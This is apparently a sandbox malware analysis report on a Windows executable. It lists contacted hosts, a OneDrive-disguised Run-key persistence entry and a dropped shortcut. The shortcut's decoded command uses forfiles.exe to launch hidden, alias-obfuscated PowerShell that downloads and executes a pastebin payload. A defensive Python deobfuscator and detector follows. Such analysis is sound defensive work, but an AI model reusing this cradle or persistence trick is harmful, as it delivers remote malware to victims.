Source: powershell.exe, 00000004.00000002.2573186277.0000024207C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71235C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60994C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609939000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
Source: powershell.exe, 00000004.00000002.2573186277.0000024209236000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.00000242092A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.000002420923F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
Reputation: unknown

Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2573186277.0000024207C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71235C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60994C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://0.discord.com/
Source: powershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://pastebin.com
Source: powershell.exe, 0000000C.00000002.2784074879.000001C712D5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71280A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712D7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A36A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609DF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A34E000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://pastebin.com
Source: powershell.exe, 0000000C.00000002.2784074879.000001C712D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A35A000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
162.159.138.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1534108
Start date and time: 2024-10-15 15:53:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OSLdZanXNc.exe (renamed because the original name is a hash value)
Original Sample Name: a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203.exe
Detection: MAL
Classification: mal84.troj.evad.winEXE@21/16@3/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6988 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7056 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• VT rate limit hit for: OSLdZanXNc.exe
Time | Type | Description
09:54:07 | API Interceptor | 418x Sleep call for process: powershell.exe modified
15:54:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
15:54:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Context: IPs (other samples seen contacting the same IP)

Match: 104.20.4.235
Associated Sample Name / URL | Detection | Threat Name | Context
gaber.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
sostener.vbs | malicious | XWorm | pastebin.com/raw/V9y5Q5vv
envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
Update on Payment.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr

Match: 162.159.138.232
Associated Sample Name / URL | Detection | Threat Name | Context
steamcodegenerator.exe | malicious | Unknown | -
cr_asm.ps1 | malicious | Unknown | -
SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exe | malicious | Unknown | -
SecuriteInfo.com.Python.Muldrop.18.50.31694.exe | malicious | Blank Grabber | -
Exela(1).exe | malicious | Exela Stealer, Python Stealer | -
SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | -
http://relay.csgoze520.com/ | malicious | Unknown | -
https://hkdiscord.antsoon.com/ | malicious | Unknown | -
RebelCracked.exe | malicious | Exela Stealer, Python Stealer | -
lol.exe | malicious | Blank Grabber, Umbral Stealer | -
Context: Domains (other samples seen resolving the same domain; Context is the IP it resolved to at the time)

Match: discord.com
Associated Sample Name / URL | Detection | Threat Name | Context
BeginSync lnk.lnk | malicious | Unknown | 162.159.137.232
gaber.ps1 | malicious | Unknown | 162.159.137.232
cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
cr_asm.ps1 | malicious | Unknown | 162.159.138.232
Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.135.232
Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.136.232
0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 162.159.137.232
0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 162.159.136.232
cPl7CoJTBx.exe | malicious | Luna Grabber, Luna Logger | 162.159.128.233

Match: raw.githubusercontent.com
Associated Sample Name / URL | Detection | Threat Name | Context
BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133
gaber.ps1 | malicious | Unknown | 185.199.108.133
cr_asm_crypter.ps1 | malicious | Unknown | 185.199.110.133
steamcodegenerator.exe | malicious | Unknown | 185.199.109.133
cr_asm.ps1 | malicious | Unknown | 185.199.108.133
na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
na.hta | malicious | Cobalt Strike, FormBook | 185.199.108.133
oWARzPF1Ms.exe | malicious | PureLog Stealer | 185.199.108.133
oWARzPF1Ms.exe | malicious | PureCrypter, PureLog Stealer | 185.199.108.133
New PO-RFQ13101.xla.xlsx | malicious | FormBook | 185.199.110.133
Context: ASNs (other samples seen contacting the same ASN; Context is the IP contacted)

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161
gaber.ps1 | malicious | Unknown | 162.159.137.232
cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
cr_asm.ps1 | malicious | Unknown | 162.159.138.232
HqvlYZC7Gf.exe | malicious | Unknown | 104.27.206.92
https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m- | malicious | Unknown | 162.159.134.42
https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.html | malicious | Unknown | 1.1.1.1
ordine.pdf | malicious | Unknown | 104.21.90.114
ordine.pdf | malicious | HtmlDropper | 188.114.96.3

Match: FASTLYUS
Associated Sample Name / URL | Detection | Threat Name | Context
BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133
gaber.ps1 | malicious | Unknown | 185.199.108.133
cr_asm_crypter.ps1 | malicious | Unknown | 185.199.110.133
steamcodegenerator.exe | malicious | Unknown | 185.199.111.133
cr_asm.ps1 | malicious | Unknown | 185.199.108.133
https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 151.101.1.229
na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
na.hta | malicious | Cobalt Strike, FormBook | 185.199.108.133
ordine.pdf | malicious | Unknown | 199.232.210.172
Payment(Ssalazar)CQDM.html | malicious | Unknown | 151.101.65.229
Context: JA3 fingerprints (other samples whose TLS client produced the same JA3 hash; Context is the IPs they contacted)

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Context for every row below: 104.20.4.235, 162.159.138.232, 185.199.109.133

Associated Sample Name / URL | Detection | Threat Name
BeginSync lnk.lnk | malicious | Unknown
gaber.ps1 | malicious | Unknown
cr_asm_crypter.ps1 | malicious | Unknown
steamcodegenerator.exe | malicious | Unknown
cr_asm.ps1 | malicious | Unknown
https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher
na.hta | malicious | Cobalt Strike, Remcos
na.hta | malicious | Cobalt Strike, FormBook
LISTA DE COTIZACIONES.exe | malicious | AgentTesla, PureLog Stealer
https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.gov | malicious | HTMLPhisher
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                                        Category:dropped
                                                                                        Size (bytes):1728
                                                                                        Entropy (8bit):4.527272298423835
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                                        MD5:724AA21828AD912CB466E3B0A79F478B
                                                                                        SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                                        SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                                        SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                                        Malicious:true
Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
Decoded from the preview (the shortcut's strings are UTF-16LE, so every second byte shows as a dot): the link target is C:\Windows\System32\forfiles.exe with the arguments
/p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
forfiles.exe enumerates files in /p matching /m and runs the /c command once per match; notepad.exe exists exactly once in System32, so the payload runs once and its hidden PowerShell has forfiles.exe as parent process (a LOLBin proxy launch rather than a direct powershell.exe child of explorer.exe). Inside the script, sal is Set-Alias: callit is made an alias of iex (Invoke-Expression), an alias named after the value of $env:os (Windows_NT) is made an alias of iwr (Invoke-WebRequest), and fatbake -> calc is a decoy that is never invoked. PowerShell alias names are case-insensitive, so the last statement resolves to iex (iwr pastebin.com/raw/sA04Mwk2 -UseBasicParsing): a download-and-execute cradle that fetches and evaluates whatever the pastebin paste currently contains each time the shortcut is launched. The second stage is therefore not on disk and can be swapped server-side without touching the host.
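The alias indirection in that command line is cheap to undo mechanically, which is what a triage script or a detection rule's pre-processor would do before matching on cmdlet names. The following Python is an added example for this report, not Joe Sandbox code and not part of the sample: it strips the sal / Set-Alias statements out of the inner script, rewrites every remaining token with the cmdlet it resolves to, and then flags the Invoke-Expression-over-Invoke-WebRequest pattern and the paste-site URL. The script string is the one recovered from the .lnk preview above; the built-in alias table and the assumption that $env:os expands to Windows_NT are the example's own.

```python
"""Resolve Set-Alias indirection in a PowerShell one-liner and flag download cradles.

Added example for this report (not sandbox or sample code). The input string at
the bottom is the inner script recovered from the dropped .lnk.
"""
import re

# PowerShell's own aliases that the sample leans on. Alias lookup in PowerShell
# is case-insensitive, so every table here is keyed in lowercase.
BUILTIN_ALIASES = {
    "sal": "Set-Alias",
    "iex": "Invoke-Expression",
    "iwr": "Invoke-WebRequest",
}

# Assumption: the environment variable OS is "Windows_NT", as on every
# supported Windows version; the sample uses its value as an alias name.
ENV = {"os": "Windows_NT"}

SET_ALIAS_RE = re.compile(
    r"^(?:sal|set-alias)\s+(?:-name\s+)?(\S+)\s+(?:-value\s+)?(\S+)$", re.IGNORECASE
)
ENV_RE = re.compile(r"\$env:(\w+)", re.IGNORECASE)
TOKEN_RE = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
URL_RE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}/[^\s)\"']+", re.IGNORECASE)


def expand_env(text: str) -> str:
    """Replace $env:NAME with its value (env names are case-insensitive on Windows)."""
    return ENV_RE.sub(lambda m: ENV.get(m.group(1).lower(), ""), text)


def canonical(name: str, user_aliases: dict) -> str:
    """Follow user-defined aliases first, then built-in ones, to the real cmdlet name."""
    key = name.lower()
    if key in user_aliases:
        return user_aliases[key]
    return BUILTIN_ALIASES.get(key, name)


def resolve_aliases(script: str):
    """Drop sal/Set-Alias statements and rewrite the rest with real cmdlet names.

    Returns (normalized_script, alias_table). Statements are split on ';'
    only, which is enough for one-liners of the kind seen in the shortcut.
    """
    user_aliases: dict = {}
    kept = []
    for stmt in (s.strip() for s in script.split(";")):
        if not stmt:
            continue
        m = SET_ALIAS_RE.match(stmt)
        if m:
            # The alias name may itself be an env-variable reference ($env:os).
            alias_name = expand_env(m.group(1)).lower()
            user_aliases[alias_name] = canonical(m.group(2), user_aliases)
            continue
        rewritten = TOKEN_RE.sub(lambda t: canonical(t.group(0), user_aliases), expand_env(stmt))
        kept.append(rewritten)
    return "; ".join(kept), user_aliases


def classify(normalized: str) -> dict:
    """Flag the download-and-execute pattern and pull out the fetched URL(s)."""
    low = normalized.lower()
    urls = URL_RE.findall(normalized)
    return {
        "download_cradle": "invoke-expression" in low
        and ("invoke-webrequest" in low or "downloadstring" in low),
        "urls": urls,
        "paste_service": any("pastebin.com" in u.lower() for u in urls),
    }


# Constructed from the report: the script handed to the hidden PowerShell via
# the forfiles.exe proxy in the dropped .lnk.
SAMPLE_SCRIPT = (
    "sal fatbake calc;sal callit iEx; sal $env:os iWr; "
    "calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
)

if __name__ == "__main__":
    normalized, aliases = resolve_aliases(SAMPLE_SCRIPT)
    print("aliases   :", aliases)
    print("normalized:", normalized)
    print("verdict   :", classify(normalized))
```

Running it on the shortcut's script yields the alias table {fatbake: calc, callit: Invoke-Expression, windows_nt: Invoke-WebRequest} and the normalized statement Invoke-Expression(Invoke-WebRequest pastebin.com/raw/sA04Mwk2 -usebasicparsing), which is what a Sigma rule for download cradles actually needs to see. The token rewrite is deliberately single-pass over the original text so that cmdlet names it inserts are never themselves re-resolved.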
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):11608
                                                                                        Entropy (8bit):4.890472898059848
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                        MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                        SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                        SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                        SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1940658735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllulp/lh:NllUp/l
                                                                                        MD5:33079FB821DDC3C0C3169070389E05AC
                                                                                        SHA1:CBE9016199CAF57FED3BAFA2AD960922C5DAECC5
                                                                                        SHA-256:335AA3A5D5715EC6B459D9702386A083ACF1636EB9B682A9A05FB470AC2352F5
                                                                                        SHA-512:785115207C136DE9D490C9BAE08BDECD206A7ADF7616D8FAF2CBC04320ECA3E3B996C9EF368561D8BF966CD691CB83819C4D4EC89848E2FDCC0ED308503D0F49
                                                                                        Malicious:false
                                                                                        Preview:@...e...............................R.>!.............@..........
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
The same 60-byte AppLocker probe file (identical MD5, SHA-1, SHA-256 and SHA-512 to the entry above, Malicious:false, written by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) is listed a further 11 times in the original report, one entry per PowerShell instance that wrote it; those repeated entries are identical to the one above and are collapsed here.
                                                                                        Process:C:\Users\user\Desktop\OSLdZanXNc.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):72
                                                                                        Entropy (8bit):4.644610558622846
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:5FqvS0qfFXVbARV6oa:B0sVbz
                                                                                        MD5:FDF2E994BEA34B6B6F4B94DE701994AB
                                                                                        SHA1:B6F158090800D5706252CB4010AE55C77EA9CB27
                                                                                        SHA-256:7D681BAF6C76989E40D7669842EAC13A5A2115FED59D7DE645AEDA202206B5BD
                                                                                        SHA-512:788A36DCC54BB9AD0D6EE9501EFAC0A7FB65BCDE9060484E454BB98D334FAA5DFB3272FD38E39DC1F43E412FCB1274331CD6219B82214553E384A1BAA7280DE5
                                                                                        Malicious:false
Preview:[#] Usage : OSLdZanXNc.exe <Input x64 exe> <*Output*>..[#] Output : ....
The dots are the CRLF line terminators noted in the file type. The text is the binary's own usage banner: run without the expected arguments, it reports that it takes an x64 executable as input and an output path, and the empty "Output" line shows it produced nothing in this run.
                                                                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                        Entropy (8bit):6.115613434611554
                                                                                        TrID:
                                                                                        • Win64 Executable Console (202006/5) 92.65%
                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: OSLdZanXNc.exe
File size: 45'568 bytes
MD5: 98ff253f6f854df7b7f6794a2761dbd1
SHA1: 246ae6060c76a6751b6ba2d9ca0de18e298b5e26
SHA256: a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203
SHA512: 4e8a028a5f8a49e734cdf58f2337a486c7268997296f1048d5481896452524873345b74cb31c9ffd47db1721c6b5c927542e2f979341459f7da6d70ac287972d
SSDEEP: 768:DvoFKVVoTnsXSkAut5oIZ3tHgBqT35QMt4135P:DvoFKYg7TBZBSW5Q04j
TLSH: 1F236BA5BA5100D8C47B4078C92BD2FDB2B2FC95074096EF4301866D3FB37E8A9B6715
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........J..g...g...g.......g..}f...g.K.c...g..}d...g..}c...g..}b...g...f...g...f...g..zo...g..z....g..ze...g.Rich..g................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x140001e80
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows cui (console)
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x66FF04D1 [Thu Oct 3 20:55:45 2024 UTC]
TLS Callbacks: none (the TLS data directory is empty)
CLR (.Net) Version: none (native PE; the COM descriptor directory is empty)
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: a43d15331c9ee28121574258bd659d78
Instructions at the entrypoint (0x140001e80), decoded as x86-64 (each 48h REX.W prefix belongs to the 64-bit instruction that follows it). The comments name the standard MSVC CRT routines this code matches, with the imports that serve them:

; mainCRTStartup
sub rsp, 28h
call 00007F546C718AECh              ; __security_init_cookie
add rsp, 28h
jmp 00007F546C718597h               ; __scrt_common_main_seh
int3
int3
; __raise_securityfailure(EXCEPTION_POINTERS*): hand a /GS failure to the unhandled-exception path, then terminate
push rbx
sub rsp, 20h
mov rbx, rcx
xor ecx, ecx
call qword ptr [rip+000081F3h]      ; SetUnhandledExceptionFilter(NULL)
mov rcx, rbx
call qword ptr [rip+000081F2h]      ; UnhandledExceptionFilter(exception_pointers)
call qword ptr [rip+000081DCh]      ; GetCurrentProcess()
mov rcx, rax
mov edx, C0000409h                  ; STATUS_STACK_BUFFER_OVERRUN
add rsp, 20h
pop rbx
jmp qword ptr [rip+000081C0h]       ; TerminateProcess(hProcess, 0xC0000409)
; __report_gsfailure(StackCookie): reached when __security_check_cookie finds a corrupted stack cookie
mov qword ptr [rsp+08h], rcx        ; spill StackCookie to its home slot
sub rsp, 38h
mov ecx, 00000017h                  ; PF_FASTFAIL_AVAILABLE
call qword ptr [rip+000081A4h]      ; IsProcessorFeaturePresent(PF_FASTFAIL_AVAILABLE)
test eax, eax
je 00007F546C718729h
mov ecx, 00000002h                  ; FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
int 29h                             ; __fastfail: the kernel terminates the process, no user-mode handler runs
lea rcx, [rip+0000A232h]            ; &GS_ContextRecord
call 00007F546C7187CEh              ; capture_previous_context (RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind)
mov rax, qword ptr [rsp+38h]        ; return address of the function whose cookie failed
mov qword ptr [rip+0000A319h], rax  ; GS_ContextRecord.Rip
lea rax, [rsp+38h]
add rax, 08h
mov qword ptr [rip+0000A2A9h], rax  ; GS_ContextRecord.Rsp
mov rax, qword ptr [rip+0000A302h]
mov qword ptr [rip+0000A173h], rax  ; GS_ExceptionRecord.ExceptionAddress = GS_ContextRecord.Rip
mov rax, qword ptr [rsp+40h]        ; StackCookie (spilled above)
mov qword ptr [rip+0000A277h], rax  ; GS_ContextRecord.Rcx = StackCookie
mov dword ptr [rip+0000A14Dh], C0000409h  ; GS_ExceptionRecord.ExceptionCode = STATUS_STACK_BUFFER_OVERRUN
mov dword ptr [rip+0000A147h], 00000001h  ; GS_ExceptionRecord.ExceptionFlags = EXCEPTION_NONCONTINUABLE
mov dword ptr [rip+0000A151h], 00000001h  ; GS_ExceptionRecord.NumberParameters = 1
Programming Language:
• [IMP] VS2008 SP1 build 30729 (guess based on the import hash; the VCRUNTIME140.dll and api-ms-win-crt-*.dll imports belong to the Universal CRT shipped with Visual Studio 2015 and later, so the real toolchain is newer than this guess)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb3fc           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xe000           0x1e0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0xd000           0x588         .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xf000           0x30          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xa9e0           0x70          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa8a0           0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
